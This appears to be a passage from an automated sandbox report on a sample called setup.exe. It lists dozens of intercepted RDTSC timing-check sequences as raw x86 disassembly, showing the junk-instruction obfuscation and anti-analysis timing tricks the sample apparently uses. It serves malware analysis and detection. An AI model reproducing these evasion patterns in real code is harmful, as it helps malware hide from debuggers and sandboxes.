                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C5FB8 second address: 3C6048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F47D8E3B0A8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F47D8E3B0A8h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 jmp 00007F47D8E3B0B7h 0x00000045 jmp 00007F47D8E3B0B4h 0x0000004a push 00000000h 0x0000004c mov dword ptr [ebp+122DB73Fh], edx 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C6048 second address: 3C604E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C61DE second address: 3C61FB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edx 0x0000000e js 00007F47D8E3B0A6h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F47D8E3B0A6h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C61FB second address: 3C61FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C802B second address: 3C8035 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F47D8E3B0ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C718C second address: 3C7192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C903D second address: 3C9078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F47D8E3B0B8h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007F47D8E3B0B8h 0x00000014 pop edi 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C9078 second address: 3C912F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F47D8E48268h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov bl, 91h 0x00000026 xor di, 03CBh 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F47D8E48268h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov di, D0D5h 0x0000004b xor ebx, 6BC0166Bh 0x00000051 mov edi, 6E2E0A33h 0x00000056 push 00000000h 0x00000058 call 00007F47D8E4826Ah 0x0000005d mov di, 9A30h 0x00000061 pop ebx 0x00000062 jl 00007F47D8E48274h 0x00000068 jmp 00007F47D8E4826Eh 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 pushad 0x00000072 popad 0x00000073 jmp 00007F47D8E48277h 0x00000078 popad 0x00000079 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C912F second address: 3C9135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C9135 second address: 3C9139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CB00E second address: 3CB0A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007F47D8E3B0B3h 0x00000010 jmp 00007F47D8E3B0ADh 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F47D8E3B0A8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D24DDh], edi 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 xor dword ptr [ebp+122D2CD2h], edx 0x0000003f pop ebx 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007F47D8E3B0A8h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c and di, 840Bh 0x00000061 mov ebx, dword ptr [ebp+122D38ACh] 0x00000067 mov ebx, dword ptr [ebp+122D3854h] 0x0000006d xchg eax, esi 0x0000006e push eax 0x0000006f push edx 0x00000070 push edx 0x00000071 pushad 0x00000072 popad 0x00000073 pop edx 0x00000074 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CB0A9 second address: 3CB0AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CB0AE second address: 3CB0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F47D8E3B0B2h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CD17B second address: 3CD17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CD17F second address: 3CD183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CD183 second address: 3CD195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F47D8E48268h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CD195 second address: 3CD1FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F47D8E3B0B0h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F47D8E3B0A8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov ebx, dword ptr [ebp+122D295Ch] 0x0000002c push 00000000h 0x0000002e or dword ptr [ebp+122D28BBh], edi 0x00000034 push 00000000h 0x00000036 call 00007F47D8E3B0ACh 0x0000003b pop ebx 0x0000003c jnp 00007F47D8E3B0A9h 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 pop eax 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CD1FB second address: 3CD20F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48270h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CD20F second address: 3CD23A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0B5h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CD23A second address: 3CD240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CB29F second address: 3CB353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F47D8E3B0ACh 0x0000000b popad 0x0000000c nop 0x0000000d sub edi, 7EE2A94Fh 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov edi, dword ptr [ebp+122D2A24h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push ecx 0x00000028 mov edi, dword ptr [ebp+1248495Bh] 0x0000002e pop ebx 0x0000002f mov bx, 6713h 0x00000033 mov eax, dword ptr [ebp+122D0311h] 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F47D8E3B0A8h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push eax 0x00000058 call 00007F47D8E3B0A8h 0x0000005d pop eax 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 add dword ptr [esp+04h], 00000019h 0x0000006a inc eax 0x0000006b push eax 0x0000006c ret 0x0000006d pop eax 0x0000006e ret 0x0000006f or bx, 7C80h 0x00000074 mov ebx, dword ptr [ebp+122D2A2Ch] 0x0000007a nop 0x0000007b push eax 0x0000007c jmp 00007F47D8E3B0B5h 0x00000081 pop eax 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 jmp 00007F47D8E3B0AAh 0x0000008a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CB353 second address: 3CB35D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F47D8E48266h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CC2FF second address: 3CC3A5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F47D8E3B0A8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push edi 0x00000029 mov ebx, 52BAEEE0h 0x0000002e pop ebx 0x0000002f push dword ptr fs:[00000000h] 0x00000036 xor edi, 615BE237h 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 call 00007F47D8E3B0A8h 0x0000004b pop eax 0x0000004c mov dword ptr [esp+04h], eax 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc eax 0x00000059 push eax 0x0000005a ret 0x0000005b pop eax 0x0000005c ret 0x0000005d mov ebx, dword ptr [ebp+1248493Fh] 0x00000063 mov ebx, 400639D1h 0x00000068 mov eax, dword ptr [ebp+122D0EFDh] 0x0000006e mov dword ptr [ebp+1247ABC1h], ecx 0x00000074 push FFFFFFFFh 0x00000076 sub edi, dword ptr [ebp+1247A6F6h] 0x0000007c push eax 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007F47D8E3B0B5h 0x00000085 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CD36C second address: 3CD37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F47D8E4826Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3D0090 second address: 3D0095 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CF332 second address: 3CF345 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47D8E4826Bh 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CF345 second address: 3CF349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3D0095 second address: 3D00DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F47D8E48268h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 mov edi, dword ptr [ebp+122D298Ah] 0x0000002e push 00000000h 0x00000030 movsx ebx, dx 0x00000033 and ebx, dword ptr [ebp+122D3688h] 0x00000039 push eax 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jno 00007F47D8E48266h 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3D00DD second address: 3D00E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3D0F28 second address: 3D0F70 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 add bh, FFFFFFBFh 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F47D8E48268h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov edi, esi 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c add edi, dword ptr [ebp+122D3970h] 0x00000032 mov dword ptr [ebp+12484427h], edi 0x00000038 popad 0x00000039 mov ebx, 6C0890A6h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push ecx 0x00000042 pushad 0x00000043 popad 0x00000044 pop ecx 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3D0F70 second address: 3D0F7A instructions: 0x00000000 rdtsc 0x00000002 je 00007F47D8E3B0ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3D8E04 second address: 3D8E2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Dh 0x00000007 jmp 00007F47D8E48272h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3D8E2B second address: 3D8E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F47D8E3B0A6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3DEE2E second address: 3DEE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3DEE32 second address: 3DEE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F47D8E3B0AAh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3DEE51 second address: 3DEE56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3DEE56 second address: 3DEE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3DEF50 second address: 3DEF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3DEF54 second address: 3DEF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F47D8E3B0A6h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E44DD second address: 3E4504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48278h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007F47D8E48266h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E4504 second address: 3E4510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F47D8E3B0A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E4510 second address: 3E4518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E4518 second address: 3E4523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E4523 second address: 3E4527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E4527 second address: 3E452B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E370C second address: 3E3710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E3869 second address: 3E386D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E386D second address: 3E3882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E39A9 second address: 3E39B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E39B3 second address: 3E39CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48275h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E39CF second address: 3E39E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E3CDB second address: 3E3CE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E3E6E second address: 3E3E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E3FF5 second address: 3E3FF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E3FF9 second address: 3E400A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F47D8E3B0A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E400A second address: 3E4027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48278h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E4027 second address: 3E402D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E402D second address: 3E4033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E4175 second address: 3E418F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 jne 00007F47D8E3B0A8h 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E418F second address: 3E419B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F47D8E48266h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E419B second address: 3E419F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E8F08 second address: 3E8F1C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47D8E48268h 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F47D8E4826Eh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 36CABC second address: 36CAC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E7D32 second address: 3E7D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 jmp 00007F47D8E4826Dh 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E7D48 second address: 3E7D6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F47D8E3B0A6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E7D6A second address: 3E7D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BF410 second address: 3BF42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B5h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BF42A second address: 399C08 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F47D8E48268h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007F47D8E48274h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F47D8E48268h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov edx, 7F0CDDD1h 0x00000033 lea eax, dword ptr [ebp+124941F6h] 0x00000039 nop 0x0000003a push edi 0x0000003b jmp 00007F47D8E48273h 0x00000040 pop edi 0x00000041 push eax 0x00000042 push ecx 0x00000043 push esi 0x00000044 jc 00007F47D8E48266h 0x0000004a pop esi 0x0000004b pop ecx 0x0000004c nop 0x0000004d mov ch, bh 0x0000004f sbb edi, 0370D000h 0x00000055 call dword ptr [ebp+122D2C7Dh] 0x0000005b pushad 0x0000005c jmp 00007F47D8E48273h 0x00000061 jmp 00007F47D8E48279h 0x00000066 push ebx 0x00000067 jmp 00007F47D8E48270h 0x0000006c jmp 00007F47D8E48270h 0x00000071 pop ebx 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFAFB second address: 3BFB00 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFB00 second address: 3BFB15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 je 00007F47D8E48268h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
